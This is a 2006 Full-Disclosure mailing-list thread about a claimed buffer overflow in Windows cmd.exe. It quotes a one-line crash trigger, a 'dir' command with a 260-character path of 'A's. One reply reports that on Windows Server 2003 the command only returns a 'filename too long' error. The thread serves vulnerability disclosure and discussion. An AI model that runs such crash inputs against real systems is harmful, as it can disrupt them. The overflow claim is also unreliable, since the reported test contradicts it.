[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Windows Command Processor CMD.EXE Buffer Overflow
- To: <vuln-dev@xxxxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] Windows Command Processor CMD.EXE Buffer Overflow
- From: "Luis Alberto Cortes Zavala" <napasn@xxxxxxxxxxxxxxxxxx>
- Date: Fri, 20 Oct 2006 14:33:00 -0500
YEah! Buffer Overflow Windows XP SP2
I Hill debug this.
Luís Alberto Cortes Zavala
IT / Security Consultant
napa@xxxxxxxxxxxxxxxxxx
http://www.securitynation.com
-----Mensaje original-----
De: listbounce@xxxxxxxxxxxxxxxxx [mailto:listbounce@xxxxxxxxxxxxxxxxx] En
nombre de The SNiFF
Enviado el: Viernes, 20 de Octubre de 2006 03:58 a.m.
Para: vuln-dev@xxxxxxxxxxxxxxxxx
Asunto: Re: Windows Command Processor CMD.EXE Buffer Overflow
> Copy-paste the following line in cmd.exe and execute it..
> (it is a single command, has been split into multiple lines for
> readability sake).
>
> %COMSPEC% /K "dir
>
\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
>
> (260 characters of 'A's)
Tried it on Win2k3 SP1:
C:\Documents and Settings\Administrator>%COMSPEC% /K
"dir\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
System replied:
The filename or extension is too long.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/